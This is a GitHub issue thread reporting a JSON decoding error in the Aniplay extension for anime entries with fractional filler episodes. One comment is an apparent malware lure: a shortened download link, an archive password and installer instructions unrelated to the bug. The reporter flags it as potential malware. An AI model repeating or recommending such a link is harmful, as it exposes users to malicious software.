### ISSUE TITLE
Aniplay JsonDecoding Exception on specific Titles

### ISSUE THREAD

**Issue by YouSummoner** [Kohi-den/extensions-source#184]
### Source information

Aniplay 14.3

### Source language

English 

### Steps to reproduce

1. Try to open an entry with filler episodes. Ex: Nier: Automata season 2 has the episode 6.5

### Expected behavior

It throws an error.
![Screenshot_20240827-221718_Aniyomi](https://github.com/user-attachments/assets/a0169707-2230-4911-b29b-0c706f5d185d)

### Actual behavior

The episodes should be listed.

### Aniyomi version

Preview r7801

### Android version

Android 14

### Other details

It doesn't happen on all titles, just the ones with filler episodes like that.

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open or closed issue.
- [X] I have written a short but informative title.
- [X] I have updated the app to version **[0.15.2.4](https://github.com/aniyomiorg/aniyomi/releases/latest)**.
- [X] I have updated all installed extensions.
- [X] I have tried the [troubleshooting guide](https://aniyomi.org/docs/guides/troubleshooting/).
- [X] If this is an issue with the app itself, I should be opening an issue in the [app repository](https://github.com/aniyomiorg/aniyomi/issues/new/choose).
- [X] I will fill out all of the requested information in this form.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by YouSummoner** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

Potential Malware, maintainer please delete this comment....
